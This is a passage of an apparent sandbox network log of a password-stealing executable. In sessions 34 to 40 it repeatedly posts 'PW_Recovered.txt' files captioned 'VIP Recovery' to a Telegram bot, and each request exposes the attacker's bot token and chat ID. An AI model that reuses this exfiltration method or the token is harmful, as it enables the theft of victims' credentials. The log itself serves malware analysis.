                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:45 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41014,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546865,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.750019149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:46 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3a42a08a2d1a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:46 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 61 34 32 61 30 38 61 32 64 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3a42a08a2d1aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:46 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:46 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:46 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41015,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546866,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.750020149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:47 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3a8a01617b77
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:47 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 61 38 61 30 31 36 31 37 62 37 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3a8a01617b77Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:47 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:47 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:47 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41016,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546867,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            36192.168.2.750021149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:48 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3ad90f094b47
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:48 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 61 64 39 30 66 30 39 34 62 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3ad90f094b47Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:48 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:48 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:48 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41017,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546868,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            37192.168.2.750022149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:49 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3b27997aeb2a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:49 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 62 32 37 39 39 37 61 65 62 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3b27997aeb2aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:52 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:52 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:52 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41018,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546872,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            38192.168.2.750023149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:53 UTC377OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3c6dcdf66e26
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:07:53 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 36 64 63 64 66 36 36 65 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3c6dcdf66e26Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:53 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:53 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:53 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41019,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546873,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            39192.168.2.750024149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:54 UTC353OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3cc36a30dbf7
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            2025-01-10 22:07:54 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 63 63 33 36 61 33 30 64 62 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3cc36a30dbf7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:54 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:54 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 22:07:54 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 36 38 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":41020,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1736546874,"document"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            40192.168.2.750025149.154.167.2204437872C:\Users\user\Desktop\Yef4EqsQha.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 22:07:55 UTC377OUTPOST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3d1e894396a8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 585
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 22:07:55 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 64 31 65 38 39 34 33 39 36 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 35 35 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 37 3a 30 36
                                                                                                            Data Ascii: --------------------------8dd3d1e894396a8Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:216554Date and Time: 10/01/2025 / 17:06
                                                                                                            2025-01-10 22:07:55 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 22:07:55 GMT
